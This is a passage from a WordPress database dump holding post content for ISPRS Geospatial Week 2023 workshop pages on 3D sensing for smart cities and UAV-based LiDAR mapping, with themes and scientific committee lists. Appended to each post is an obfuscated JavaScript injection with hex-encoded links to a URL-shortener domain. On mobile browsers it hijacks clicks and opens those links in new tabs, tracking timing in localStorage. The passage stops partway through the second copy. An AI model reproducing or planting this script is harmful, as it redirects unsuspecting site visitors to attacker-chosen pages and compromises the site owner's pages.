USA</strong></h6>\n</li>\n<li>\n<h6><strong>Bisheng Yang, Wuhan University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Jonathan Li, University of Waterloo, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Cheng Wang, Chinese Academy of Sciences, China</strong></h6>\n</li>\n<li>\n<h6><strong>Chun Liu, Tongji University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Jinha Jung, Purdue University, USA</strong></h6>\n</li>\n<li>\n<h6><strong>Yan Xia, Technical University of Munich, Germany</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','3DS Smart Cities - 3D Sensing for Smart Cities','','publish','closed','closed','','3ds-smart-cities-3d-sensing-for-smart-cities','','','2023-02-09 06:57:58','2023-02-09 06:57:58','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=2572',0,'dt_portfolio','',0),
(2573,1,'2022-10-07 20:10:01','2022-10-07 20:10:01','','3DS Smart Cities - 3D Sensing for Smart Cities','','inherit','closed','closed','','2572-revision-v1','','','2022-10-07 20:10:01','2022-10-07 20:10:01','',2572,'https://gsw2023.com/?p=2573',0,'revision','',0),
(2574,1,'2022-10-07 20:11:21','2022-10-07 20:11:21','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2575\" img_size=\"230x230\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\">UAV-based mapping with imaging and LiDAR systems: challenges, data processing, and applications</span></h5>\r\n<h5></h5>\r\n<h5></h5>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<h5 style=\"text-align: justify; color: black;\"><strong>This workshop will seek contributions covering advanced topics related to the state of the art and future trends in 3D mapping using imaging and LiDAR units onboard Uncrewed Aerial Vehicles (UAVs). The growing interest in 3D mapping using sensing modalities onboard UAVs is motivated by continuous developments in direct geo-referencing technology (i.e., integrated Global Navigation Satellite Systems – GNSS – and Inertial Navigation Systems – INS) and remote sensing systems (i.e., passive and active imaging sensors in the visible and infrared range – RGB cameras, hyperspectral push-broom scanners, and laser scanning). Among others, solicited papers will cover the following topics: 1) algorithmic developments for improved system calibration of multi-sensor/multi-platform UAV-based mapping; 2) challenges facing UAV-based Structure-from-Motion strategies for deriving point clouds from imagery; 3) benefits of integrating imaging and LiDAR systems onboard UAVs;  4) applications of UAV-based remote sensing systems for a wide range of applications including precision agriculture, documentation of crash scenes, shoreline monitoring, digital forestry, and mapping of highway construction work zones; and 5) interactive visualization of multi-sensor/multi-platform/temporal geospatial data for improved comprehension of delivered products from UAV-based mobile mapping systems.</strong></h5>\r\n<h5 style=\"text-align: justify; color: black;\"><strong>The workshop will be part of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h5>\r\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][dt_team_carousel order=\"asc\" posts_offset=\"0\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" category=\"39\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"sky\" style=\"shadow\"][vc_column_text]</p>\r\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\r\n<p>[/vc_column_text][vc_separator color=\"sky\" style=\"shadow\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_separator border_width=\"5\"][/vc_column][vc_column width=\"1/2\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\r\n<h5 style=\"text-align:justify; color:blue;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n<li>\r\n<h6><strong>Multi-rotor, fixed-wing, and hybrid UAVs</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>System calibration</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Georeferencing: direct, indirect, and integrated sensor orientation</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Structure form motion</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Data analytics for LiDAR point clouds</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Visual and LiDAR SLAM</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>UAV mapping applications</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>UAV mapping in GNSS-challenging/denied environments</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Sensor fusion in support of UAV navigation and mapping</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Deep Learning strategies in support UAV mapping activities</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Visualization of UAV data and products</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Integration of UAV data with geospatial data from high-altitude and terrestrial platforms</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Creating benchmark training datasets for deep learning strategies</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Quality assurance and quality control of UAV mapping</strong></h6>\r\n</li>\r\n</ul>\r\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\r\n<h5 style=\"text-align:justify; color:blue;\"><strong><u>Scientific Committee:</u></strong></h5>\r\n<ul>\r\n<li>\r\n<h6><strong>Mohamed Mostafa, Trimble</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Adel Moussa, UofC</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Kai-Wei Cheng, National Cheng Kung University, Taiwan</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Andrea Masiero, University of Florence, Italy</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Aboelmagd Noureldin, Queens University, Canada</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Cheng Wang, Xiamen University, China</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Antonio Vettore, University of Padova, Italy</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Allison Kealy, RMIT, Australia</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Mohamed Elhabiby, Micro Engineering Tech Inc. (METI), Canada</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Jonathan Li, University of Waterloo, Canada</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Chenglu Wen, Xiamen University, China</strong></h6>\r\n</li>\r\n</ul>\r\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 